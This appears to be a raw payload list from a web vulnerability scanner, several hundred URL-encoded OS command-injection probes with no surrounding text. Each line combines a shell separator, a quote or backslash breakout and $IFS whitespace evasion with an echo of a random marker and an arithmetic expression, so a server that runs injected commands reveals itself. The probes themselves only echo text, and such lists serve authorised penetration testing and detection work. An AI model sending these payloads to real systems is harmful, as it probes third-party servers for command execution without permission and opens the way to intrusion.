+%3Becho$IFSVTOBEN$((34%2B25))$(echo$IFSVTOBEN)VTOBEN +%26echo$IFSSXZPOT$((38%2B66))$(echo$IFSSXZPOT)SXZPOT +%26%26echo$IFSGEDMFF$((95%2B24))$(echo$IFSGEDMFF)GEDMFF +%7Cecho$IFSPCVHGX$((0%2B12))$(echo$IFSPCVHGX)PCVHGX +%7C%7Cecho$IFSXSJZOO$((37%2B56))$(echo$IFSXSJZOO)XSJZOO +echo$IFSCMWXRB$((87%2B22))$(echo$IFSCMWXRB)CMWXRB// +%20echo%20KRHFKC$((96%2B42))$(echo%20KRHFKC)KRHFKC// +;echo$IFSXLBAJP$((6%2B21))$(echo$IFSXLBAJP)XLBAJP// +&echo$IFSUPQDIN$((21%2B80))$(echo$IFSUPQDIN)UPQDIN// +|echo$IFSMCYFYC$((94%2B33))$(echo$IFSMCYFYC)MCYFYC// +||echo$IFSWYWPXY$((38%2B95))$(echo$IFSWYWPXY)WYWPXY// +&&echo$IFSVJEYML$((92%2B5))$(echo$IFSVJEYML)VJEYML// +%0aecho$IFSRWHBOB$((34%2B55))$(echo$IFSRWHBOB)RWHBOB// +%3Becho$IFSWWQHXI$((34%2B88))$(echo$IFSWWQHXI)WWQHXI// +%26echo$IFSXQTVXE$((32%2B91))$(echo$IFSXQTVXE)XQTVXE// +%26%26echo$IFSMLKYIC$((73%2B57))$(echo$IFSMLKYIC)MLKYIC// +%7Cecho$IFSTILOLK$((60%2B88))$(echo$IFSTILOLK)TILOLK// +%7C%7Cecho$IFSAFCKFD$((42%2B76))$(echo$IFSAFCKFD)AFCKFD// +echo$IFSDMXBXH$((83%2B95))$(echo$IFSDMXBXH)DMXBXH\ +%20echo%20WGOISG$((75%2B94))$(echo%20WGOISG)WGOISG\ +;echo$IFSGJTRRT$((27%2B79))$(echo$IFSGJTRRT)GJTRRT\ +&echo$IFSIDNISX$((2%2B59))$(echo$IFSIDNISX)IDNISX\ +|echo$IFSBHTKLO$((25%2B57))$(echo$IFSBHTKLO)BHTKLO\ +||echo$IFSKDHDGC$((60%2B80))$(echo$IFSKDHDGC)KDHDGC\ +&&echo$IFSHDXHXA$((99%2B37))$(echo$IFSHDXHXA)HDXHXA\ +%0aecho$IFSDQGTJY$((5%2B21))$(echo$IFSDQGTJY)DQGTJY\ +%3Becho$IFSGCRBKK$((37%2B88))$(echo$IFSGCRBKK)GCRBKK\ +%26echo$IFSTZBZPJ$((19%2B93))$(echo$IFSTZBZPJ)TZBZPJ\ +%26%26echo$IFSHWUDRE$((0%2B26))$(echo$IFSHWUDRE)HWUDRE\ +%7Cecho$IFSHJFTBK$((77%2B76))$(echo$IFSHJFTBK)HJFTBK\ +%7C%7Cecho$IFSWNQFEN$((48%2B59))$(echo$IFSWNQFEN)WNQFEN\ +echo$IFSFOGUBG$((54%2B25))$(echo$IFSFOGUBG)FOGUBG& +%20echo%20THSJII$((27%2B68))$(echo%20THSJII)THSJII& +;echo$IFSONOVRU$((18%2B41))$(echo$IFSONOVRU)ONOVRU& +&echo$IFSPTCLJM$((60%2B39))$(echo$IFSPTCLJM)PTCLJM& +|echo$IFSCYPEHE$((10%2B73))$(echo$IFSCYPEHE)CYPEHE& +||echo$IFSLRYRKA$((33%2B67))$(echo$IFSLRYRKA)LRYRKA& +&&echo$IFSVGHYXY$((50%2B76))$(echo$IFSVGHYXY)VGHYXY& +%0aecho$IFSZUCAWY$((35%2B43))$(echo$IFSZUCAWY)ZUCAWY& +%3Becho$IFSQSYGGO$((28%2B83))$(echo$IFSQSYGGO)QSYGGO& +%26echo$IFSNWCZGN$((26%2B20))$(echo$IFSNWCZGN)NWCZGN& +%26%26echo$IFSSGSOLC$((27%2B7))$(echo$IFSSGSOLC)SGSOLC& +%7Cecho$IFSQBNKUQ$((13%2B79))$(echo$IFSQBNKUQ)QBNKUQ& +%7C%7Cecho$IFSVKQXGG$((70%2B99))$(echo$IFSVKQXGG)VKQXGG& +echo$IFSRVGTQR$((51%2B29))$(echo$IFSRVGTQR)RVGTQR| +%20echo%20EYXSLH$((96%2B88))$(echo%20EYXSLH)EYXSLH| +;echo$IFSNXMKIN$((19%2B24))$(echo$IFSNXMKIN)NXMKIN| +&echo$IFSXDFWBW$((45%2B98))$(echo$IFSXDFWBW)XDFWBW| +|echo$IFSKQQQWP$((52%2B17))$(echo$IFSKQQQWP)KQQQWP| +||echo$IFSGIFLOU$((73%2B67))$(echo$IFSGIFLOU)GIFLOU| +&&echo$IFSYPPVOY$((46%2B66))$(echo$IFSYPPVOY)YPPVOY| +%0aecho$IFSXLQCAL$((78%2B24))$(echo$IFSXLQCAL)XLQCAL| +%3Becho$IFSTWQPEL$((97%2B38))$(echo$IFSTWQPEL)TWQPEL| +%26echo$IFSGUZCFQ$((77%2B81))$(echo$IFSGUZCFQ)GUZCFQ| +%26%26echo$IFSLJOFVO$((24%2B48))$(echo$IFSLJOFVO)LJOFVO| +%7Cecho$IFSMCDDQX$((44%2B84))$(echo$IFSMCDDQX)MCDDQX| +%7C%7Cecho$IFSGCTODU$((64%2B18))$(echo$IFSGCTODU)GCTODU| +echo$IFSIEJMEW$((30%2B85))$(echo$IFSIEJMEW)IEJMEW%27 +%20echo%20RTIRFH$((5%2B80))$(echo%20RTIRFH)RTIRFH%27 +;echo$IFSMTICKY$((40%2B79))$(echo$IFSMTICKY)MTICKY%27 +&echo$IFSPSIGPS$((6%2B9))$(echo$IFSPSIGPS)PSIGPS%27 +|echo$IFSDVQOYX$((82%2B10))$(echo$IFSDVQOYX)DVQOYX%27 +||echo$IFSTFMZPK$((99%2B59))$(echo$IFSTFMZPK)TFMZPK%27 +&&echo$IFSZENPOV$((15%2B5))$(echo$IFSZENPOV)ZENPOV%27 +%0aecho$IFSFXFLFR$((67%2B52))$(echo$IFSFXFLFR)FXFLFR%27 +%3Becho$IFSLZZDLP$((79%2B69))$(echo$IFSLZZDLP)LZZDLP%27 +%26echo$IFSQGKCTR$((36%2B15))$(echo$IFSQGKCTR)QGKCTR%27 +%26%26echo$IFSNCHUMN$((98%2B30))$(echo$IFSNCHUMN)NCHUMN%27 +%7Cecho$IFSGUAVSF$((73%2B82))$(echo$IFSGUAVSF)GUAVSF%27 +%7C%7Cecho$IFSOQAOQJ$((62%2B26))$(echo$IFSOQAOQJ)OQAOQJ%27 +echo$IFSJIKZPM$((54%2B42))$(echo$IFSJIKZPM)JIKZPM%22 +%20echo%20XQIFQU$((35%2B24))$(echo%20XQIFQU)XQIFQU%22 +;echo$IFSXKJHCR$((60%2B67))$(echo$IFSXKJHCR)XKJHCR%22 +&echo$IFSAKVCNQ$((27%2B21))$(echo$IFSAKVCNQ)AKVCNQ%22 +|echo$IFSOLRTPJ$((84%2B81))$(echo$IFSOLRTPJ)OLRTPJ%22 +||echo$IFSBEZGQL$((84%2B6))$(echo$IFSBEZGQL)BEZGQL%22 +&&echo$IFSAUBGIO$((90%2B39))$(echo$IFSAUBGIO)AUBGIO%22 +%0aecho$IFSQSKWMC$((77%2B87))$(echo$IFSQSKWMC)QSKWMC%22 +%3Becho$IFSVSJXTC$((59%2B79))$(echo$IFSVSJXTC)VSJXTC%22 +%26echo$IFSFXPYJN$((43%2B47))$(echo$IFSFXPYJN)FXPYJN%22 +%26%26echo$IFSZFLJBI$((82%2B4))$(echo$IFSZFLJBI)ZFLJBI%22 +%7Cecho$IFSIWTKTR$((97%2B63))$(echo$IFSIWTKTR)IWTKTR%22 +%7C%7Cecho$IFSOQUJVO$((83%2B79))$(echo$IFSOQUJVO)OQUJVO%22 +echo$IFSKNEEFY$((64%2B22))$(echo$IFSKNEEFY)KNEEFY%5C%5C +%20echo%20NWXHAH$((8%2B91))$(echo%20NWXHAH)NWXHAH%5C%5C +;echo$IFSBFZZSW$((3%2B5))$(echo$IFSBFZZSW)BFZZSW%5C%5C +&echo$IFSROVZMD$((87%2B57))$(echo$IFSROVZMD)ROVZMD%5C%5C +|echo$IFSKMAXDB$((68%2B24))$(echo$IFSKMAXDB)KMAXDB%5C%5C +||echo$IFSVNXMDZ$((95%2B0))$(echo$IFSVNXMDZ)VNXMDZ%5C%5C +&&echo$IFSXUVPOU$((27%2B3))$(echo$IFSXUVPOU)XUVPOU%5C%5C +%0aecho$IFSZFETQZ$((73%2B0))$(echo$IFSZFETQZ)ZFETQZ%5C%5C +%3Becho$IFSMLEFQQ$((44%2B34))$(echo$IFSMLEFQQ)MLEFQQ%5C%5C +%26echo$IFSWBFNGR$((6%2B4))$(echo$IFSWBFNGR)WBFNGR%5C%5C +%26%26echo$IFSPENFBQ$((61%2B76))$(echo$IFSPENFBQ)PENFBQ%5C%5C +%7Cecho$IFSACIPGG$((38%2B64))$(echo$IFSACIPGG)ACIPGG%5C%5C +%7C%7Cecho$IFSSIGJRV$((49%2B39))$(echo$IFSSIGJRV)SIGJRV%5C%5C +echo$IFSZZSSEM$((14%2B66))$(echo$IFSZZSSEM)ZZSSEM%2F%2F +%20echo%20APYFLP$((24%2B89))$(echo%20APYFLP)APYFLP%2F%2F +;echo$IFSGLSCFU$((80%2B7))$(echo$IFSGLSCFU)GLSCFU%2F%2F +&echo$IFSZRWAWQ$((82%2B93))$(echo$IFSZRWAWQ)ZRWAWQ%2F%2F +|echo$IFSSCCGYA$((3%2B93))$(echo$IFSSCCGYA)SCCGYA%2F%2F +||echo$IFSEYVRFU$((99%2B52))$(echo$IFSEYVRFU)EYVRFU%2F%2F +&&echo$IFSBMUAXQ$((31%2B95))$(echo$IFSBMUAXQ)BMUAXQ%2F%2F +%0aecho$IFSERJIXU$((33%2B2))$(echo$IFSERJIXU)ERJIXU%2F%2F +%3Becho$IFSVYLEJO$((26%2B40))$(echo$IFSVYLEJO)VYLEJO%2F%2F +%26echo$IFSYNKNBL$((5%2B94))$(echo$IFSYNKNBL)YNKNBL%2F%2F +%26%26echo$IFSUCPLDI$((23%2B55))$(echo$IFSUCPLDI)UCPLDI%2F%2F +%7Cecho$IFSMZTBUS$((51%2B6))$(echo$IFSMZTBUS)MZTBUS%2F%2F +%7C%7Cecho$IFSWPWCJS$((96%2B60))$(echo$IFSWPWCJS)WPWCJS%2F%2F +echo$IFSVVUMIP$((18%2B35))$(echo$IFSVVUMIP)VVUMIP%26 +%20echo%20JDCGXZ$((41%2B96))$(echo%20JDCGXZ)JDCGXZ%26 +;echo$IFSUTEXYG$((37%2B68))$(echo$IFSUTEXYG)UTEXYG%26 +&echo$IFSQRHEWM$((81%2B88))$(echo$IFSQRHEWM)QRHEWM%26 +|echo$IFSLADZJA$((28%2B57))$(echo$IFSLADZJA)LADZJA%26 +||echo$IFSFTKMXB$((12%2B13))$(echo$IFSFTKMXB)FTKMXB%26 +&&echo$IFSTGBJOB$((42%2B77))$(echo$IFSTGBJOB)TGBJOB%26 +%0aecho$IFSFQSEMN$((91%2B33))$(echo$IFSFQSEMN)FQSEMN%26 +%3Becho$IFSTLHIDP$((89%2B98))$(echo$IFSTLHIDP)TLHIDP%26 +%26echo$IFSZBBPPT$((70%2B6))$(echo$IFSZBBPPT)ZBBPPT%26 +%26%26echo$IFSITMNHS$((43%2B23))$(echo$IFSITMNHS)ITMNHS%26 +%7Cecho$IFSJJYVVI$((35%2B34))$(echo$IFSJJYVVI)JJYVVI%26 +%7C%7Cecho$IFSLPCDFP$((34%2B63))$(echo$IFSLPCDFP)LPCDFP%26 +echo$IFSYJNHDQ$((89%2B22))$(echo$IFSYJNHDQ)YJNHDQ%7C +%20echo%20EEIYPU$((65%2B19))$(echo%20EEIYPU)EEIYPU%7C +;echo$IFSDWCZMD$((39%2B76))$(echo$IFSDWCZMD)DWCZMD%7C +&echo$IFSJSBLAG$((55%2B76))$(echo$IFSJSBLAG)JSBLAG%7C +|echo$IFSYOKOTJ$((77%2B9))$(echo$IFSYOKOTJ)YOKOTJ%7C +||echo$IFSCNIKQI$((90%2B80))$(echo$IFSCNIKQI)CNIKQI%7C +&&echo$IFSRZHDUN$((30%2B97))$(echo$IFSRZHDUN)RZHDUN%7C +%0aecho$IFSCPVCLF$((68%2B4))$(echo$IFSCPVCLF)CPVCLF%7C +%3Becho$IFSOMAEJD$((8%2B77))$(echo$IFSOMAEJD)OMAEJD%7C +%26echo$IFSDOPRZR$((76%2B69))$(echo$IFSDOPRZR)DOPRZR%7C +%26%26echo$IFSUEFESK$((60%2B44))$(echo$IFSUEFESK)UEFESK%7C +%7Cecho$IFSMQMMWX$((90%2B32))$(echo$IFSMQMMWX)MQMMWX%7C +%7C%7Cecho$IFSBVFYIU$((58%2B91))$(echo$IFSBVFYIU)BVFYIU%7C +%27echo$IFSBUSFOU$((97%2B37))$(echo$IFSBUSFOU)BUSFOU +%27%20echo%20LNVEVW$((12%2B50))$(echo%20LNVEVW)LNVEVW +%27;echo$IFSCGEDHZ$((15%2B86))$(echo$IFSCGEDHZ)CGEDHZ +%27&echo$IFSGDHEQM$((75%2B6))$(echo$IFSGDHEQM)GDHEQM +%27|echo$IFSFRPQGH$((5%2B72))$(echo$IFSFRPQGH)FRPQGH +%27||echo$IFSUBXJUF$((52%2B61))$(echo$IFSUBXJUF)UBXJUF +%27&&echo$IFSQNMPMK$((16%2B94))$(echo$IFSQNMPMK)QNMPMK +%27%0aecho$IFSHPJBTS$((68%2B1))$(echo$IFSHPJBTS)HPJBTS +%27%3Becho$IFSOLZUHI$((11%2B76))$(echo$IFSOLZUHI)OLZUHI +%27%26echo$IFSJWPFEA$((61%2B64))$(echo$IFSJWPFEA)JWPFEA +%27%26%26echo$IFSYRTQWI$((45%2B7))$(echo$IFSYRTQWI)YRTQWI +%27%7Cecho$IFSOJYTMR$((97%2B63))$(echo$IFSOJYTMR)OJYTMR +%27%7C%7Cecho$IFSBJRIVZ$((1%2B4))$(echo$IFSBJRIVZ)BJRIVZ +%27echo$IFSFYUXPA$((17%2B24))$(echo$IFSFYUXPA)FYUXPA' +%27%20echo%20KFJYWO$((38%2B75))$(echo%20KFJYWO)KFJYWO' +%27;echo$IFSUEBNRK$((21%2B43))$(echo$IFSUEBNRK)UEBNRK' +%27&echo$IFSDSFELH$((48%2B16))$(echo$IFSDSFELH)DSFELH' +%27|echo$IFSCJAOLS$((84%2B11))$(echo$IFSCJAOLS)CJAOLS' +%27||echo$IFSXGULGC$((75%2B10))$(echo$IFSXGULGC)XGULGC' +%27&&echo$IFSOACPHB$((5%2B90))$(echo$IFSOACPHB)OACPHB' +%27%0aecho$IFSXIUKHX$((92%2B44))$(echo$IFSXIUKHX)XIUKHX' +%27%3Becho$IFSQSZIFF$((21%2B56))$(echo$IFSQSZIFF)QSZIFF' +%27%26echo$IFSVDFJNU$((23%2B92))$(echo$IFSVDFJNU)VDFJNU' +%27%26%26echo$IFSJDHREU$((48%2B43))$(echo$IFSJDHREU)JDHREU' +%27%7Cecho$IFSRWDBVK$((60%2B13))$(echo$IFSRWDBVK)RWDBVK' +%27%7C%7Cecho$IFSHNNQHD$((64%2B5))$(echo$IFSHNNQHD)HNNQHD' +%27echo$IFSOXXBHC$((79%2B27))$(echo$IFSOXXBHC)OXXBHC" +%27%20echo%20RCKFYK$((92%2B33))$(echo%20RCKFYK)RCKFYK" +%27;echo$IFSFQQLKE$((2%2B42))$(echo$IFSFQQLKE)FQQLKE" +%27&echo$IFSHKZBYJ$((43%2B76))$(echo$IFSHKZBYJ)HKZBYJ" +%27|echo$IFSXRLZPA$((20%2B95))$(echo$IFSXRLZPA)XRLZPA" +%27||echo$IFSLYKBHC$((81%2B81))$(echo$IFSLYKBHC)LYKBHC" +%27&&echo$IFSHDYGZO$((21%2B59))$(echo$IFSHDYGZO)HDYGZO" +%27%0aecho$IFSDOHOCR$((5%2B11))$(echo$IFSDOHOCR)DOHOCR" +%27%3Becho$IFSVMLEXC$((19%2B49))$(echo$IFSVMLEXC)VMLEXC" +%27%26echo$IFSHNQWXR$((73%2B6))$(echo$IFSHNQWXR)HNQWXR" +%27%26%26echo$IFSJPJHMZ$((45%2B17))$(echo$IFSJPJHMZ)JPJHMZ" +%27%7Cecho$IFSWNRKQX$((15%2B90))$(echo$IFSWNRKQX)WNRKQX" +%27%7C%7Cecho$IFSGVINFF$((91%2B35))$(echo$IFSGVINFF)GVINFF" +%27echo$IFSISEHFM$((85%2B7))$(echo$IFSISEHFM)ISEHFM +%27%20echo%20RFTTCP$((93%2B3))$(echo%20RFTTCP)RFTTCP +%27;echo$IFSNHOFBW$((39%2B34))$(echo$IFSNHOFBW)NHOFBW +%27&echo$IFSOZTHGM$((17%2B60))$(echo$IFSOZTHGM)OZTHGM +%27|echo$IFSUJIVOM$((80%2B49))$(echo$IFSUJIVOM)UJIVOM +%27||echo$IFSWKWPWF$((88%2B99))$(echo$IFSWKWPWF)WKWPWF +%27&&echo$IFSOVRJWM$((23%2B86))$(echo$IFSOVRJWM)OVRJWM +%27%0aecho$IFSTWUNTD$((44%2B76))$(echo$IFSTWUNTD)TWUNTD +%27%3Becho$IFSIFOFAH$((63%2B44))$(echo$IFSIFOFAH)IFOFAH +%27%26echo$IFSUEVCYJ$((85%2B1))$(echo$IFSUEVCYJ)UEVCYJ +%27%26%26echo$IFSEWMPRK$((42%2B18))$(echo$IFSEWMPRK)EWMPRK +%27%7Cecho$IFSYKIMMG$((43%2B81))$(echo$IFSYKIMMG)YKIMMG +%27%7C%7Cecho$IFSCJHVPM$((51%2B52))$(echo$IFSCJHVPM)CJHVPM +%27echo$IFSKCWCVA$((72%2B1))$(echo$IFSKCWCVA)KCWCVA// +%27%20echo%20AUYIEK$((56%2B8))$(echo%20AUYIEK)AUYIEK// +%27;echo$IFSOTEELC$((4%2B24))$(echo$IFSOTEELC)OTEELC// +%27&echo$IFSZQMJNG$((96%2B27))$(echo$IFSZQMJNG)ZQMJNG// +%27|echo$IFSKGTHSZ$((31%2B23))$(echo$IFSKGTHSZ)KGTHSZ// +%27||echo$IFSOQCUYN$((22%2B3))$(echo$IFSOQCUYN)OQCUYN// +%27&&echo$IFSKQBPBW$((96%2B27))$(echo$IFSKQBPBW)KQBPBW// +%27%0aecho$IFSDLBZBO$((23%2B48))$(echo$IFSDLBZBO)DLBZBO// +%27%3Becho$IFSCFBNIF$((41%2B28))$(echo$IFSCFBNIF)CFBNIF// +%27%26echo$IFSJMGRNT$((10%2B51))$(echo$IFSJMGRNT)JMGRNT// +%27%26%26echo$IFSLVYIOD$((15%2B38))$(echo$IFSLVYIOD)LVYIOD// +%27%7Cecho$IFSWWFYLU$((17%2B21))$(echo$IFSWWFYLU)WWFYLU// +%27%7C%7Cecho$IFSRRGUPN$((69%2B6))$(echo$IFSRRGUPN)RRGUPN// +%27echo$IFSQTYJUU$((57%2B7))$(echo$IFSQTYJUU)QTYJUU\ +%27%20echo%20NPYOVU$((6%2B61))$(echo%20NPYOVU)NPYOVU\ +%27;echo$IFSIZUWXV$((86%2B66))$(echo$IFSIZUWXV)IZUWXV\ +%27&echo$IFSLRYHAU$((84%2B4))$(echo$IFSLRYHAU)LRYHAU\ +%27|echo$IFSYHECUO$((78%2B29))$(echo$IFSYHECUO)YHECUO\ +%27||echo$IFSRIFFSO$((66%2B74))$(echo$IFSRIFFSO)RIFFSO\ +%27&&echo$IFSKITBIZ$((2%2B45))$(echo$IFSKITBIZ)KITBIZ\ +%27%0aecho$IFSMNPQOV$((53%2B67))$(echo$IFSMNPQOV)MNPQOV\ +%27%3Becho$IFSBXCHUC$((98%2B22))$(echo$IFSBXCHUC)BXCHUC\ +%27%26echo$IFSHBDZXC$((96%2B3))$(echo$IFSHBDZXC)HBDZXC\ +%27%26%26echo$IFSBVHNWZ$((43%2B2))$(echo$IFSBVHNWZ)BVHNWZ\ +%27%7Cecho$IFSFCLIWQ$((68%2B57))$(echo$IFSFCLIWQ)FCLIWQ\ +%27%7C%7Cecho$IFSCKVBFP$((70%2B7))$(echo$IFSCKVBFP)CKVBFP\ +%27echo$IFSENOPZR$((31%2B41))$(echo$IFSENOPZR)ENOPZR& +%27%20echo%20ENKTWS$((18%2B26))$(echo%20ENKTWS)ENKTWS& +%27;echo$IFSXFMQSA$((31%2B54))$(echo$IFSXFMQSA)XFMQSA& +%27&echo$IFSEJMOPP$((83%2B86))$(echo$IFSEJMOPP)EJMOPP& +%27|echo$IFSMCIDIP$((54%2B31))$(echo$IFSMCIDIP)MCIDIP& +%27||echo$IFSVGJPPI$((78%2B43))$(echo$IFSVGJPPI)VGJPPI& +%27&&echo$IFSRURCZX$((52%2B67))$(echo$IFSRURCZX)RURCZX& +%27%0aecho$IFSNUAPKN$((22%2B15))$(echo$IFSNUAPKN)NUAPKN& +%27%3Becho$IFSRZLSCU$((35%2B98))$(echo$IFSRZLSCU)RZLSCU& +%27%26echo$IFSPGDDIP$((30%2B43))$(echo$IFSPGDDIP)PGDDIP& +%27%26%26echo$IFSSFCCJW$((70%2B23))$(echo$IFSSFCCJW)SFCCJW& +%27%7Cecho$IFSBBTQTF$((39%2B3))$(echo$IFSBBTQTF)BBTQTF& +%27%7C%7Cecho$IFSAEDQZA$((27%2B88))$(echo$IFSAEDQZA)AEDQZA& +%27echo$IFSNSNDEQ$((93%2B51))$(echo$IFSNSNDEQ)NSNDEQ| +%27%20echo%20KLCYYE$((89%2B0))$(echo%20KLCYYE)KLCYYE| +%27;echo$IFSRNDFJD$((90%2B55))$(echo$IFSRNDFJD)RNDFJD| +%27&echo$IFSXNSQSX$((90%2B70))$(echo$IFSXNSQSX)XNSQSX| +%27|echo$IFSNIHTHK$((9%2B70))$(echo$IFSNIHTHK)NIHTHK| +%27||echo$IFSBLPPXU$((2%2B17))$(echo$IFSBLPPXU)BLPPXU| +%27&&echo$IFSOOJWHW$((27%2B7))$(echo$IFSOOJWHW)OOJWHW| +%27%0aecho$IFSONEZGX$((68%2B29))$(echo$IFSONEZGX)ONEZGX| +%27%3Becho$IFSCJUMYI$((23%2B49))$(echo$IFSCJUMYI)CJUMYI| +%27%26echo$IFSOZMCUX$((65%2B38))$(echo$IFSOZMCUX)OZMCUX| +%27%26%26echo$IFSFYRIYE$((49%2B44))$(echo$IFSFYRIYE)FYRIYE| +%27%7Cecho$IFSNSAIBB$((53%2B67))$(echo$IFSNSAIBB)NSAIBB| +%27%7C%7Cecho$IFSXNUTZK$((27%2B45))$(echo$IFSXNUTZK)XNUTZK| +%27echo$IFSOFNFSY$((33%2B29))$(echo$IFSOFNFSY)OFNFSY%27 +%27%20echo%20WBRAYT$((68%2B32))$(echo%20WBRAYT)WBRAYT%27 +%27;echo$IFSHOOXVC$((69%2B30))$(echo$IFSHOOXVC)HOOXVC%27 +%27&echo$IFSBBRTZG$((50%2B1))$(echo$IFSBBRTZG)BBRTZG%27 +%27|echo$IFSPDOCRP$((90%2B89))$(echo$IFSPDOCRP)PDOCRP%27 +%27||echo$IFSMYGHXG$((70%2B58))$(echo$IFSMYGHXG)MYGHXG%27 +%27&&echo$IFSIIHKFG$((7%2B64))$(echo$IFSIIHKFG)IIHKFG%27 +%27%0aecho$IFSYAFSKC$((98%2B11))$(echo$IFSYAFSKC)YAFSKC%27 +%27%3Becho$IFSLZXFCH$((44%2B38))$(echo$IFSLZXFCH)LZXFCH%27 +%27%26echo$IFSAPFBSK$((40%2B51))$(echo$IFSAPFBSK)APFBSK%27 +%27%26%26echo$IFSFTQZAZ$((66%2B79))$(echo$IFSFTQZAZ)FTQZAZ%27 +%27%7Cecho$IFSGQCFSG$((77%2B66))$(echo$IFSGQCFSG)GQCFSG%27 +%27%7C%7Cecho$IFSLNILSC$((52%2B23))$(echo$IFSLNILSC)LNILSC%27 +%27echo$IFSFOVBLV$((51%2B93))$(echo$IFSFOVBLV)FOVBLV%22 +%27%20echo%20KEIMRP$((17%2B26))$(echo%20KEIMRP)KEIMRP%22 +%27;echo$IFSXUIGJZ$((84%2B80))$(echo$IFSXUIGJZ)XUIGJZ%22 +%27&echo$IFSBOCKFB$((70%2B90))$(echo$IFSBOCKFB)BOCKFB%22 +%27|echo$IFSMPTNCZ$((32%2B33))$(echo$IFSMPTNCZ)MPTNCZ%22 +%27||echo$IFSJZSHOM$((90%2B14))$(echo$IFSJZSHOM)JZSHOM%22 +%27&&echo$IFSRQAZYH$((37%2B77))$(echo$IFSRQAZYH)RQAZYH%22 +%27%0aecho$IFSCNBVMZ$((1%2B71))$(echo$IFSCNBVMZ)CNBVMZ%22 +%27%3Becho$IFSMGMRMA$((41%2B1))$(echo$IFSMGMRMA)MGMRMA%22 +%27%26echo$IFSLXYYNO$((16%2B12))$(echo$IFSLXYYNO)LXYYNO%22 +%27%26%26echo$IFSTZEQVF$((83%2B23))$(echo$IFSTZEQVF)TZEQVF%22 +%27%7Cecho$IFSQDDMWF$((38%2B22))$(echo$IFSQDDMWF)QDDMWF%22 +%27%7C%7Cecho$IFSDEQICN$((63%2B9))$(echo$IFSDEQICN)DEQICN%22 +%27echo$IFSYZWJVC$((52%2B73))$(echo$IFSYZWJVC)YZWJVC%5C%5C +%27%20echo%20CKNGPL$((15%2B58))$(echo%20CKNGPL)CKNGPL%5C%5C +%27;echo$IFSSHQCUK$((3%2B51))$(echo$IFSSHQCUK)SHQCUK%5C%5C +%27&echo$IFSRROPXW$((41%2B77))$(echo$IFSRROPXW)RROPXW%5C%5C +%27|echo$IFSVBZXOU$((17%2B37))$(echo$IFSVBZXOU)VBZXOU%5C%5C +%27||echo$IFSSWPMAE$((92%2B33))$(echo$IFSSWPMAE)SWPMAE%5C%5C +%27&&echo$IFSBTAEIF$((13%2B69))$(echo$IFSBTAEIF)BTAEIF%5C%5C +%27%0aecho$IFSNOGTKT$((72%2B41))$(echo$IFSNOGTKT)NOGTKT%5C%5C +%27%3Becho$IFSLXLIDX$((76%2B8))$(echo$IFSLXLIDX)LXLIDX%5C%5C +%27%26echo$IFSUNGUOC$((43%2B21))$(echo$IFSUNGUOC)UNGUOC%5C%5C +%27%26%26echo$IFSFRTUVD$((22%2B54))$(echo$IFSFRTUVD)FRTUVD%5C%5C +%27%7Cecho$IFSEVZHLM$((41%2B61))$(echo$IFSEVZHLM)EVZHLM%5C%5C +%27%7C%7Cecho$IFSJFYJHQ$((96%2B6))$(echo$IFSJFYJHQ)JFYJHQ%5C%5C +%27echo$IFSRHCRJN$((88%2B78))$(echo$IFSRHCRJN)RHCRJN%2F%2F +%27%20echo%20CCRTJP$((52%2B3))$(echo%20CCRTJP)CCRTJP%2F%2F +%27;echo$IFSXUUDGE$((67%2B2))$(echo$IFSXUUDGE)XUUDGE%2F%2F +%27&echo$IFSTZNBWT$((87%2B69))$(echo$IFSTZNBWT)TZNBWT%2F%2F +%27|echo$IFSQJCEHO$((0%2B51))$(echo$IFSQJCEHO)QJCEHO%2F%2F +%27||echo$IFSJIUIDF$((89%2B41))$(echo$IFSJIUIDF)JIUIDF%2F%2F +%27&&echo$IFSEQCQBA$((18%2B65))$(echo$IFSEQCQBA)EQCQBA%2F%2F +%27%0aecho$IFSOETQLB$((10%2B18))$(echo$IFSOETQLB)OETQLB%2F%2F +%27%3Becho$IFSKTDMLA$((82%2B25))$(echo$IFSKTDMLA)KTDMLA%2F%2F +%27%26echo$IFSDXNLEZ$((56%2B76))$(echo$IFSDXNLEZ)DXNLEZ%2F%2F +%27%26%26echo$IFSDXQHAS$((90%2B85))$(echo$IFSDXQHAS)DXQHAS%2F%2F +%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F +%27%7C%7Cecho$IFSMPGVLE$((9%2B44))$(echo$IFSMPGVLE)MPGVLE%2F%2F +%27echo$IFSXLGSCN$((77%2B2))$(echo$IFSXLGSCN)XLGSCN%26 +%27%20echo%20DOOTQL$((40%2B84))$(echo%20DOOTQL)DOOTQL%26 +%27;echo$IFSVAUTCF$((31%2B25))$(echo$IFSVAUTCF)VAUTCF%26 +%27&echo$IFSLVUBOX$((6%2B49))$(echo$IFSLVUBOX)LVUBOX%26 +%27|echo$IFSNHYJTJ$((44%2B34))$(echo$IFSNHYJTJ)NHYJTJ%26 +%27||echo$IFSDZJSFZ$((60%2B65))$(echo$IFSDZJSFZ)DZJSFZ%26 +%27&&echo$IFSMSRADT$((94%2B98))$(echo$IFSMSRADT)MSRADT%26 +%27%0aecho$IFSEMNGCD$((37%2B86))$(echo$IFSEMNGCD)EMNGCD%26 +%27%3Becho$IFSCAUOQJ$((92%2B34))$(echo$IFSCAUOQJ)CAUOQJ%26 +%27%26echo$IFSNWJCNK$((78%2B98))$(echo$IFSNWJCNK)NWJCNK%26 +%27%26%26echo$IFSVZAYJB$((24%2B72))$(echo$IFSVZAYJB)VZAYJB%26 +%27%7Cecho$IFSQSZPWD$((73%2B91))$(echo$IFSQSZPWD)QSZPWD%26 +%27%7C%7Cecho$IFSVCFZJU$((65%2B17))$(echo$IFSVCFZJU)VCFZJU%26 +%27echo$IFSBKEPKJ$((50%2B70))$(echo$IFSBKEPKJ)BKEPKJ%7C +%27%20echo%20UVFTTN$((65%2B44))$(echo%20UVFTTN)UVFTTN%7C +%27;echo$IFSWZVYQZ$((68%2B9))$(echo$IFSWZVYQZ)WZVYQZ%7C +%27&echo$IFSHXZBRD$((3%2B30))$(echo$IFSHXZBRD)HXZBRD%7C +%27|echo$IFSTBYTAT$((44%2B46))$(echo$IFSTBYTAT)TBYTAT%7C +%27||echo$IFSRQPTDA$((77%2B60))$(echo$IFSRQPTDA)RQPTDA%7C +%27&&echo$IFSGQWBLL$((20%2B82))$(echo$IFSGQWBLL)GQWBLL%7C +%27%0aecho$IFSNTGMHS$((16%2B18))$(echo$IFSNTGMHS)NTGMHS%7C +%27%3Becho$IFSHXPCVJ$((50%2B88))$(echo$IFSHXPCVJ)HXPCVJ%7C +%27%26echo$IFSKBFTYY$((46%2B12))$(echo$IFSKBFTYY)KBFTYY%7C 